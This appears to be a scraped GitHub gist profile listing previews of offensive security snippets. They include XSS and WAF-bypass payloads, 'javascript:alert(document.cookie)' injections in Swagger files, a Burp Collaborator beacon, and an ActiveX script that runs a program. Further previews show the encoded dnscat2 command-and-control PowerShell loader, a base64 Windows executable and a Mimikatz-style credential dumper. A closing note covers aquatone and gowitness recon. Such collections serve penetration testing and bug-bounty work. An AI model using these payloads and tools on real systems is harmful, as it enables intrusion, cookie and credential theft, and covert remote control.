Skip to content

Instantly share code, notes, and snippets.

Avatar

Superbug xsuperbug

  • Superbug
  • Turkey
View GitHub Profile
@xsuperbug
xsuperbug / mutation_a.txt
Created Oct 15, 2020 — forked from hackerscrolls/mutation_a.txt
Mutation points in <a> tag for WAF bypass
View mutation_a.txt
<a[1]href[2]=[3]"[4]java[5]script:[6]alert(1)">
[1]
Bytes:
\x09 \x0a \x0c \x0d \x20 \x2f
<a/href="javascript:alert(1)">
<a\x09href="javascript:alert(1)">
[2,3]
View href_bypass.html
<!--javascript -->
ja&Tab;vascript:alert(1)
ja&NewLine;vascript:alert(1)
ja&#x0000A;vascript:alert(1)
java&#x73;cript:alert()
<!--::colon:: -->
javascript&colon;alert()
javascript&#x0003A;alert()
javascript&#58;alert(1)
View gist:700fe2adc9f9476958670108e5d834e8
<script language="javascript" type="text/javascript">
function OpenFile(){
alert ('Work');
var x = new ActiveXObject("WScript.Shell");
x.run('calc.exe');
}
</script>
</head>
<body onload="OpenFile()">
View dnscat2.ps1
# Load Rebex ECC DLL for net20
# Source: http://labs.rebex.net/curves
$EncodedCompressedFile = @'
7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8ivvipP+nX+LV/jV/j1/h16P//9//9a/waf9evIc/vqT83PX8Q/f83+V3+nt/k1/jbfuyf/13/rl/z+T//u76ZF026qquLOluk02y5rNp0kqf1epkWy/Tpl6/TRTXLx7/xb5z8bgrj5emv8Ws8/zV/7V/j8uKnf28D9z/6NX6t3/U3/DV/g1/j1/iT6P+/nny2/Bvp95R++YfoJ7DD77+W4I3H/Pw1fo0f48/x/Nq/xu/5h/8av8Zvxv9zP+0Pfn47gvsavxDcrV/bfOo9/9Fv8Gv8RvTjr/obfoNf43eKfD34pL/Gr/EbeH/+BvT3t72/x23+rqWf7Z/4G8hYMFbF2zz08R8wrpt6Sr8zbhg7Bvqn/AZBu9+T/jeu87KihsAVODOsP6PX7knwAT0vQddfQ3D7tX6NX/fX+Kf+tl/n1/iPftWv/Wv8mt2Gt3we/Vpbv9mv8Wskv9av/UsIwq/zrV/wa/1i/vlr/JY7v9av8VvR9/TXb/5rr2kwv1by623/Wr/Nt36tX2+LRvTrfetIGv7a/O//9Wt+67fc+TV/jd/01+Bh/ObyVfJb/BpbvzmB/tZ/8Gv9Olv0wa/3a2//hjX9XDW/BX36g1+X/vqt7V+/1q+9RW//er+EOvp1fq1f95f8OozDr004nCiegzA+GYCBYf16DIjg/bo6tl9bf/46+pM/57H+Dr8G+I/G+mvd+7V+22/92uvf4td0I65+SwzjUl77tflf/mj0G1CXTI3f5lsv5NvqtwIxtwjur5d964+RDka/sfz8tZs/9teltgqm+W
View swagger.json
swagger: "2.0",
info:
title: "Swagger Sample App",
description: "Please to click Terms of service"
termsOfService: "javascript:alert(document.cookie)"
contact:
name: "API Support",
url: "javascript:alert(document.cookie)",
email: "javascript:alert(document.cookie)"
version: "1.0.1"
View swagger.yaml
swagger: '2.0'
info:
version: "0.0.1"
title: Example Title
description: <img src="https://828fh2yinnngr821bgxe95574yapye.burpcollaborator.net">
paths:
/:
get:
responses:
200:
View test
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDALVJqloAAAAAAAAAAOAAIgALATAAAA4AAAAIAAAAAAAAiiwAAAAgAAAAQAAAAABAAAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAACAAAAAAgAAAAAAAAMAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAADgsAABPAAAAAEAAAPQFAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAkAwAAAAgAAAADgAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAPQFAAAAQAAAAAYAAAAQAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAGAAAAACAAAAFgAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAABsLAAAAAAAAEgAAAACAAUAcCEAAMgKAAABAAAAAQAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABswAwADAQAAAQAAESgPAAAKcgEAAHAoEAAACm8RAAAKKA8AAApyAQAAcCgQAAAKbxIAAAoCLFwCjixYAigBAAArEgAoFAAACixJBhYvFXINAABwKBUAAAoGKBYAAAo4gAAAAHKBAABwBmwoFwAACgsSASgYAAAKjBkAAAFy4QAAcCgZAAAKKBUAAAoGKBYAAAorUHL5AABwKBUAAAooGgAACigVAAAKcm8BAHAoFQAA
View test
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width">
<title>JS Bin</title>
</head>
<body>
<object/onerror=write`1`//
View invoke-mimidogz.ps1
This file has been truncated, but you can view the full file.
function Invoke-Mimidogz
{
[CmdletBinding(DefaultParameterSetName="DumpCred")]
Param(
[Parameter(Position = 0)]
[String[]]
$ComputerName,
@xsuperbug
xsuperbug / reconme.txt
Created May 29, 2018 — forked from rootxharsh/reconme.txt
Aquatone and gowitness
View reconme.txt
###
If you use kali or any distro over SSH (like Droplet or VM with no GUI), You might have noticed aquatone does require xorg.
This few lines will help you create a report of domains with response headers and screenshots using gowitness.
Gowitness : https://github.com/sensepost/gowitness
Aquatone : https://github.com/michenriksen/aquatone
> Setup Kali Linux Hyper-V OR Ubuntu droplet
> Set VM/Droplet to Apache on boot. (Also SSH if it's VM)
> Set VM to start on host boot